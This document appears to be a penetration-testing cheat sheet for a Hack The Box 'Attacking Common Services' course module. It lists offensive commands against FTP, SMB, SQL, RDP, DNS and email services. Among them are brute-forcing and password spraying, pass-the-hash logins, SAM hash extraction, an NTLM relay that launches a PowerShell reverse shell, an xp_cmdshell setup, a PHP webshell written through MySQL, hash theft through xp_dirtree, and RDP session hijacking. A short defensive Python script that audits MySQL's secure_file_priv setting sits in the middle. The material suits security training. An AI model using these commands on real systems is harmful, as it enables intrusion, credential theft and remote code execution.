Attacking Common Services Module Cheat Sheet

Uploaded by hchapage

ATTACKING COMMON SERVICES CHEAT SHEET

Attacking FTP

ftp 192.168.2.142
    Connecting to the FTP server using the ftp client.

nc -v 192.168.2.142 21
    Connecting to the FTP server using netcat.

hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142
    Brute-forcing the FTP service.

Attacking SMB

smbclient -N -L //10.129.14.128
    Null-session testing against the SMB service.

smbmap -H 10.129.14.128
    Network share enumeration using smbmap.

smbmap -H 10.129.14.128 -r notes
    Recursive network share enumeration using smbmap.

smbmap -H 10.129.14.128 --download "notes\note.txt"
    Download a specific file from the shared folder.

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
    Upload a specific file to the shared folder.

rpcclient -U'%' 10.10.110.17
    Null-session with rpcclient.

./enum4linux-ng.py 10.10.11.45 -A -C
    Automated enumeration of the SMB service using enum4linux-ng.

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'
    Password spraying against different users from a list.

impacket-psexec administrator:'Password123!'@10.10.110.17
    Connect to the SMB service using impacket-psexec.

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
    Execute a command over the SMB service using crackmapexec.

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
    Enumerating logged-on users.

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
    Extract hashes from the SAM database.

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
    Use the Pass-The-Hash technique to authenticate on the target host.

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
    Dump the SAM database using impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>'
    Execute a PowerShell based reverse shell using impacket-ntlmrelayx.

Attacking SQL Databases

mysql -u julio -pPassword123 -h 10.129.20.13
    Connecting to the MySQL server.

sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30
    Connecting to the MSSQL server.

sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
    Connecting to the MSSQL server from Linux.

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h
    Connecting to the MSSQL server from Linux while the Windows Authentication mechanism is used by the MSSQL server.

mysql> SHOW DATABASES;
    Show all available databases in MySQL.

mysql> USE htbusers;
    Select a specific database in MySQL.

mysql> SHOW TABLES;
    Show all available tables in the selected database in MySQL.

mysql> SELECT * FROM users;
    Select all available entries from the "users" table in MySQL.

sqlcmd> SELECT name FROM master.dbo.sysdatabases
    Show all available databases in MSSQL.

sqlcmd> USE htbusers
    Select a specific database in MSSQL.

sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES
    Show all available tables in the selected database in MSSQL.

sqlcmd> SELECT * FROM users
    Select all available entries from the "users" table in MSSQL.

sqlcmd> EXECUTE sp_configure 'show advanced options', 1
    Allow advanced options to be changed.

sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1
    Enable xp_cmdshell.

sqlcmd> RECONFIGURE
    To be used after each sp_configure command to apply the changes.

sqlcmd> xp_cmdshell 'whoami'
    Execute a system command from the MSSQL server.

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'
    Create a file using MySQL.

mysql> show variables like "secure_file_priv";
    Check whether the secure file privileges are empty, which allows locally stored files on the system to be read.

sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
    Read local files in MSSQL.

mysql> select LOAD_FILE("/etc/passwd");
    Read local files in MySQL.

sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'
    Hash stealing using the xp_dirtree command in MSSQL.

sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'
    Hash stealing using the xp_subdirs command in MSSQL.

sqlcmd> SELECT srvname, isremote FROM sysservers
    Identify linked servers in MSSQL.

sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
    Identify the user and its privileges used for the remote connection in MSSQL.
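The secure_file_priv entry above is the pivot for the LOAD_FILE() and SELECT ... INTO OUTFILE entries: both only reach arbitrary paths when the variable is set to an empty string. The following script is an added example, not part of this cheat sheet or of the Hack The Box module; it audits that setting in a MySQL option file from the defender's side and classifies it into the states MySQL documents (empty = unrestricted, NULL = import/export disabled, a directory = confined to that directory, absent = server default). The option files are constructed samples, and the function names (read_secure_file_priv, classify, audit) are this example's own.

```python
"""Audit the secure_file_priv setting in a MySQL option file.

Added example (not the cheat sheet's own code). Classification:
  - "unrestricted": secure_file_priv = ""        file read/write anywhere the
                    server process can reach (the weak state the sheet checks for)
  - "disabled":     secure_file_priv = NULL      LOAD_FILE()/INTO OUTFILE turned off
  - "restricted":   secure_file_priv = /some/dir confined to one directory
  - "default":      option absent; the server uses its compiled-in default
                    (commonly /var/lib/mysql-files on packaged Linux builds)
"""
import configparser
from typing import Optional

# Constructed sample option files (not taken from any real server).
WEAK_CNF = """
[mysqld]
datadir=/var/lib/mysql
secure_file_priv=
local_infile=1
"""

HARDENED_CNF = """
[mysqld]
datadir=/var/lib/mysql
secure_file_priv=/var/lib/mysql-files
local_infile=0
"""

DISABLED_CNF = """
[mysqld]
secure_file_priv=NULL
"""


def read_secure_file_priv(cnf_text: str) -> Optional[str]:
    """Return the raw secure_file_priv value from [mysqld], or None if absent.

    MySQL option files allow a bare key with no '=' and allow quoted values,
    so the parser accepts both and the returned value is unquoted.
    """
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    parser.read_string(cnf_text)
    if not parser.has_section("mysqld") or not parser.has_option("mysqld", "secure_file_priv"):
        return None
    value = parser.get("mysqld", "secure_file_priv")
    if value is None:           # bare "secure_file_priv" line, no '='
        return ""
    return value.strip().strip('"').strip("'")


def classify(value: Optional[str]) -> str:
    """Map the raw value onto the four states listed in the module docstring."""
    if value is None:
        return "default"
    if value == "":
        return "unrestricted"
    if value.upper() == "NULL":
        return "disabled"
    return "restricted"


def audit(cnf_text: str) -> dict:
    """Return a small finding dictionary for one option file."""
    value = read_secure_file_priv(cnf_text)
    state = classify(value)
    return {
        "secure_file_priv": value,
        "state": state,
        # Only the unrestricted state lets LOAD_FILE()/INTO OUTFILE touch paths
        # such as /etc/passwd or the web root.
        "allows_arbitrary_file_io": state == "unrestricted",
    }


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF), ("disabled", DISABLED_CNF)):
        print(name, audit(text))
```

The "default" state is reported rather than guessed because the compiled-in default differs between platforms and packages; the authoritative answer on a running server is the sheet's own `show variables like "secure_file_priv";` query, and the option-file audit is what you run when reviewing configuration at rest.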

Attacking RDP

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
    Password spraying against the RDP service.

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
    Brute-forcing the RDP service.

rdesktop -u admin -p password123 192.168.2.143
    Connect to the RDP service using rdesktop in Linux.

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
    Impersonate a user without its password.

net start sessionhijack
    Execute the RDP session hijack.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
    Enable "Restricted Admin Mode" on the target Windows host.

xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA
    Use the Pass-The-Hash technique to log in on the target host without a password.

Attacking DNS

dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
    Perform an AXFR zone transfer attempt against a specific name server.

subfinder -d inlanefreight.com -v
    Brute-forcing subdomains.

host support.inlanefreight.com
    DNS lookup for the specified subdomain.

Attacking Email Services

host -t MX microsoft.com
    DNS lookup for mail servers for the specified domain.

dig mx inlanefreight.com | grep "MX" | grep -v ";"
    DNS lookup for mail servers for the specified domain.

host -t A mail1.inlanefreight.htb.
    DNS lookup of the IPv4 address for the specified subdomain.

telnet 10.10.110.20 25
    Connect to the SMTP server.

smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
    SMTP user enumeration using the RCPT command against the specified host.

python3 o365spray.py --validate --domain msplaintext.xyz
    Verify the usage of Office365 for the specified domain.

python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
    Enumerate existing users using Office365 on the specified domain.

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
    Password spraying against a list of users that use Office365 for the specified domain.

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
    Brute-forcing the POP3 service.

swaks --from [email protected] --to [email protected] --header 'Subject: Notification' --body 'Message' --server 10.10.11.213
    Testing the SMTP service for the open-relay vulnerability.
